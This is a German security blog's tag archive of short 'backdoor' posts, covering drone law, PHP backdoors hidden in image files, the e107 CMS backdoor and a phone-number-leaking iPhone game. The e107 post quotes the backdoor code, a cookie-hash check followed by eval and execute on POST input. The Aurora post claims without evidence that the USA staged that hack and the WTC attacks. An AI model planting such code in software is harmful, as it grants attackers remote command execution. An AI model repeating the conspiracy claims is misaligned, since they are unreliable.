Archiv

Artikel Tagged ‘backdoor’

Quadcopter aka Drohnen: Recht, Schmuggel, Southpark und Malware…

27. Januar 2015 Keine Kommentare

(CC) by Evilmorph

(CC) by Evilmorph

Mittlerweile hoert man immer oefter von diesen kleinen Gestalten welche die Luftraeume unsicher machen, Drohnen oder auch Quadcopter nehmen einen immer groesseren Stellenwert in unserer Gesellschaft auf und das nicht nur in Kriegsgebieten, sondern auch im privaten Bereich sind sie immer praesenter und lange kein Nerdspielzeug mehr und gerade in letzter Zeit stosse ich doch immer wieder ueber Berichte und gerade in dieser Woche doch sehr geballt und da dachte ich mir, fassen wir das einmal zusammen.

Einen interessanten Bericht zum Thema Recht und Drohnen hat Udo Vetter fuer die Arag geschrieben, fuer jeden Hobbypiloten sicherlich lesenswert, Udo erzaehlt uns hier unter anderem, dass private Hobbypiloten recht geringen Auflagen unterliegen, eine Genehmigung fuer den Flug mit der Drohne braucht man nicht, das wird erst Pflicht sobald es sich um einen gewerblichen Flug handelt.
Es gibt jedoch Staedte, wie Berlin, welche das Fliegen von Drohnen generell verbieten und auch in der Naehe von Flughaefen haben Quadcopter und Co natuerlich nichts zu suchen, auch nicht am Schlafzimmerfenster der Nachbarn… eigentlich alles Dinge die dem klar denkenden Menschen durchaus klar sein muessten bis auf eine Spielerei vielleicht, Drohnen immer so fliegen lassen, dass man sie mit den eigenen Augen auch verfolgen kann. GPS und Kameragesteuerte Drohnen sind dann leider nicht erlaubt, schade. Mehr…

PHP Code/Backdoors in Bildateien verstecken *update*

17. Oktober 2012 2 Kommentare

Im Zuge meiner Taetigkeit bin ich auf eine neue Art gestossen einen Hack zu verbergen bzw durchzufuehren, der Erfolg des Hacks haengt jedoch von einigen Faktoren ab, ist jedoch sicherlich ein denkbares Szenario und gerade fuer den Fall einer forensischen Untersuchung eine Moeglichkeit die man im Kopf behalten sollte.
Durch folgende Umstaende kam es zu einem Hack, eine Uploadfunktion welche das Hochladen von Datein erlaubte, eine Debian Installation mit mangelhaft gesetzten Einstellungen fuer das Ausfuehren PHP Scripten, schlechte PHP.INI, ohne die passenden Excludes fuer exec und Co.

Die Debian Config welche ich meine sieht folgendermassen aus: Mehr…

Indien: Apple, Nokia und RIM ermoeglichen staatliche Spionage *update*

9. Januar 2012 Keine Kommentare

Da stehen einem doch die Haare zu Berge wenn man so etwas lesen muss, Netzpolitik.org berichtet ueber eine Backdoor bei den oben genannten Herstellern: Apple, Nokia und RIM.

Nachdem indische Hacker, die sich “Lords of Dharmaraja” nennen, letzte Woche nach eigenen Angaben Teile des Quellcodes von Symantecs “Norton Antivirus” veröffentlichten, legen sie nun brisante Informationen nach:

So sollen laut geleakten indischen Regierungsdokumenten die Smartphone-Hersteller Research in Motion (RIM), Nokia und Apple in ihre Smartphones eine Backdoor eingebaut haben, die es der Regierung ermöglich, die Nutzer der Handys zu überwachen. Beigelegt wurden Protokolle von internem E-Mail-Verkehr der United States-China Economic and Security Review Mehr…

Aurora und die Chinaluege

27. Januar 2010 Keine Kommentare

Alle Welt hat momentan einmal wieder die Augen auf China gerichtet, es wird behauptet, dass die chinesische Regierung hinter den gross angelegten Hacks auf Google und Co stecken, doch gibt es hierfuer eigentlich Beweise?

Nein, diese gibt es nicht. Es mag richtig sein das die Angriffe teilweise von chinesischen Servern gekommen sind, jedoch wenn man an den Artikel Google-strikes-back hier aus dem Blog denkt, wird einem schnell bewusst das der Server der von Google uebernommen worden sein soll, nicht aus China stammt sondern aus Taiwan, kleiner aber feiner Unterschied.
Angriffe von Maschinen aus China ist fuer einen grossangelegten Hack auch kein Problem, denn das Sicherheitsbewustsein von chinesischen Buergern ist keineswegs besser als das anderer Regionen, als weiterer „Beweis“ wird eine Aussage von Joe Stewart genutzt der behauptet hat, der fragliche Code – ein Algorithmus zur Fehlerueberpruefung, sei „außerhalb Chinas so gut wie unbekannt“.
Eine vollkommen haltlose Aussage die nun auch widerlegt wurde, denn Teile des genutzen Auroraexploits kursieren schon seit 2002 im Netz wie auch von The Register berichtet wird.

Wer nun wirklich hinter dem sehr professionell angelegten Angriff steckt ist immer noch fraglich eins ist jedoch klar, wie es zu dem Angriff kam. Fuer die Sicherheitsbehoerden in den USA werden in Diensten wie GMail Backdoors eingebaut, um schnell und einfach Beweise sichern zu koennen, diese Backdoor wurde aktiv ausgenutzt, den Rest erledigten Social Communities wie Facebook und Co auf denen gezielt Mitarbeiter von Konzernen angeschrieben wurden und mit Spyware versorgt wurden.

Ich gehe nun einfach einen Schritt weiter und behaupte: Der Amerikaner war’s!
Gleicher Stil wie bei den WTC Attentaten, auch hier bin ich der Meinung das die Amerikaner dieses Verbrechen selbst begangen haben, der Grund hierfuer ist klar -> Geld und Macht.

e107.org Backdoor: The story continues

26. Januar 2010 Keine Kommentare

Nachdem hier bereits gestern von einer etwaigen Backdoor in e107 in der Version 0.7.17 berichtet wurde, geht die Geschichte nun weiter.
Scheinbar wurde diese stillschweigend aus den Sourcen entfernt und eine neue Version hochgeladen welche die Backdoor nicht enthaelt und neue Versionen der class2.php aufweist, scheinbar wurde hier in 3 Schritten gepatched, denn die aktuelle Version 0.7.17 unterscheidet sich von der die ich gestern testen konnte, jedoch war die Version die ich in den Haenden halten konnte, nicht die Version, welche das FD Posting enthalten hat.
Nun geht es weiter auf: http://e107.org/news.php finden sich ueber dem Documenttype Javascripts die dort wohl nicht sein sollten in der Form: <a href=’/wiki/docs/html/.store/[Spamtext]-[Number].php‘>spamtext</a>

Andere User berichten von ihren Virenscannern mit Meldungen wie „Virus/Spyware Mal/ObfJS-CB!“
Auch sind weitere Seiten nicht nur die News Seite betroffen.

Von den e107 Entwicklern bisher noch kein Statemen, die Webseite ist nach wie vor online, statt diese offline zu nehmen und etwaige Einbruchsspuren zu entfernen, wird hier im Hintergrund nur leise gefixed?

Update: Ich habe gerade ein Gespraech mit einem e107.org Developer gehabt, hier heisst es: Ja die Luecke ist bekannt, wir haben sie gefixed, was erwartest Du mehr? MS machts nicht besser. Das es sich hierbei um einen Silentpatch handelt interessiert wohl kaum, schliesslich machen andere auch Scheisse, wieso nicht auch im eigenen Laden.
Das nenn ich mal eine Aussage!

e107 Version 0.7.17 Backdoored?

25. Januar 2010 Keine Kommentare

Laut der ML FullDisclosure hat sich angeblich im CM-System e107 in der aktuellen Version 0.7.17 eine Backdoor eingeschlichen oder/bzw der Server wurde kompromittiert und die Sourcen wurden veraendert.

Das Team rund um e107 wurde informiert jedoch liegen noch keine offiziellen Angaben hierzu vor.
Die Backdoor befindet sich angeblich in: class2.php Line: 1876
hier soll folgender Code zu finden sein:
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {

...

if(!empty($_POST['cmd'])){
$out = execute($_POST['cmd']);
}

elseif(!empty($_POST['php'])){
ob_start();
eval($_POST['php']);
$out = ob_get_contents();
ob_end_clean();
}

Zu finden waere bei mir die md5 Zeile jedoch in Zeile 1874, den Rest kann ich nicht finden, warten wirs ab.

KategorienOpensource, Security Tags: , , , ,

iPhone Spiel liest Telefonnummern aus

7. November 2009 Keine Kommentare

Wie bekannt geworden ist, haben die Hersteller eines der beliebtesten Spiele fuer das iPhone eine Hintertuer in ihre App eingebaut, welche Telefonnummern von iPhone ausgelesen hat und diese an den Hersteller storm8 uebermittelt hat, dies war oder ist ueber eine Luecke im iPhone moeglich, die ja eigentlich vor derartigem Verhalten schuetzen sollte, Betonung liegt wohl aus sollte, aber wer Sicherheit von Appleprodukten erwartet ist eh verloren.

Bis Apple so weit ist werden noch viele Jahre vergehen, nun aber wieder zurueck zu Storm8.
Storm8 muss nun mit einer Sammelklage von iPhonenutzern rechnen und der Hersteller selbst aeussert sich mit: Die Backdoor wurde versehentlich programmiert und in den aktuellen Versionen des (oder gar der) Spiels(/e) ist die Backdoor nicht mehr implementiert.

Malware schreibt sich also nun aus versehen…

(Quelle: TheRegsiter.co.uk)